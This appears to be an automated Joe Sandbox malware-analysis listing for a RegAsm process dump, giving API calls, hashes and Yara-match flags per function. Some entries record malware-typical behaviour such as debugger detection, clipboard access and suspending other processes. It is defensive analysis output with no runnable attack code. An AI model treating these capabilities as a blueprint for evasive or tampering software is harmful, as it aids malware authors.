                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                          • String ID: p'E$JD
                                                                                                                          • API String ID: 1084509184-908320845
                                                                                                                          • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                          • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                                                          • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                          • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2829624132-0
                                                                                                                          • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                          • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                                                          • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                          • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3906539128-0
                                                                                                                          • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                          • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                                                          • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                          • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3906539128-0
                                                                                                                          • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                          • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                          • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                          • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                                                          • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1703294689-0
                                                                                                                          • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                          • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                                          • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                          • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                          • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1703294689-0
                                                                                                                          • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                          • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                          • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                          • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard$CloseDataOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2058664381-0
                                                                                                                          • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                          • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                                          • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                          • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                                          APIs
                                                                                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CloseHandleOpenResume
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3614150671-0
                                                                                                                          • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                          • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                                                                          • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                          • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                                                                          APIs
                                                                                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CloseHandleOpenSuspend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1999457699-0
                                                                                                                          • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                          • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                                                                          • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                          • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                                                                          APIs
                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                          • String ID: MZ@
                                                                                                                          • API String ID: 2325560087-2978689999
                                                                                                                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                          • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                                                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                          • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: .
                                                                                                                          • API String ID: 0-248832578
                                                                                                                          • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                          • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                                                                          • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                          • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: .
                                                                                                                          • API String ID: 0-248832578
                                                                                                                          • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                          • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                          • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                          • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                          • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                          • String ID: JD
                                                                                                                          • API String ID: 1084509184-2669065882
                                                                                                                          • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                          • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                                                          • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                          • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                                                          APIs
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale
                                                                                                                          • String ID: GetLocaleInfoEx
                                                                                                                          • API String ID: 2299586839-2904428671
                                                                                                                          • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                                          • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                                                          • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                                          • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1661935332-0
                                                                                                                          • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                          • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                                                          • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                          • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1663032902-0
                                                                                                                          • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                          • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                                                          • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                          • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2692324296-0
                                                                                                                          • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                          • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                                                          • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                          • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                                                          • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1272433827-0
                                                                                                                          • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                          • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                                                          • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                          • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                          • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
